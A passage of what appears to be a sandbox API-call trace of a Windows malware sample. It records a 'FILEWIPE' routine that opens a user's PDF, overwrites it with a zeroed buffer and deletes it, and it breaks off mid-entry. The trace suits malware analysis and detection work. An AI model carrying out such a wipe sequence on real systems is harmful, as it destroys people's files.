lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.417] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.417] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.417] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0035.421] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0035.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0xd039be70, ftLastWriteTime.dwHighDateTime=0x1d5b7b0, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x0, dwReserved1=0x777648, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 0x7c2240 [0035.421] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.424] CharLowerBuffW (in: lpsz="byte[83240]", cchLength=0xb | out: lpsz="byte[83240]") returned 0xb [0035.424] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.424] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.424] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.425] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.426] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.426] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.426] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\p_vq.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x949538 | out: hHeap=0x770000) returned 1 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.428] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.428] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.428] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cd60 [0035.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cd60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0035.429] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0035.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0035.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.429] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.430] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0035.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.430] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.430] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.430] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpFilePart=0x0) returned 0x53 [0035.431] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0x14d2d720, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 0x7c2240 [0035.431] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\p_vq.pdf")) returned 1 [0035.433] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0x14d2d720, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 0 [0035.433] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.433] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.433] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 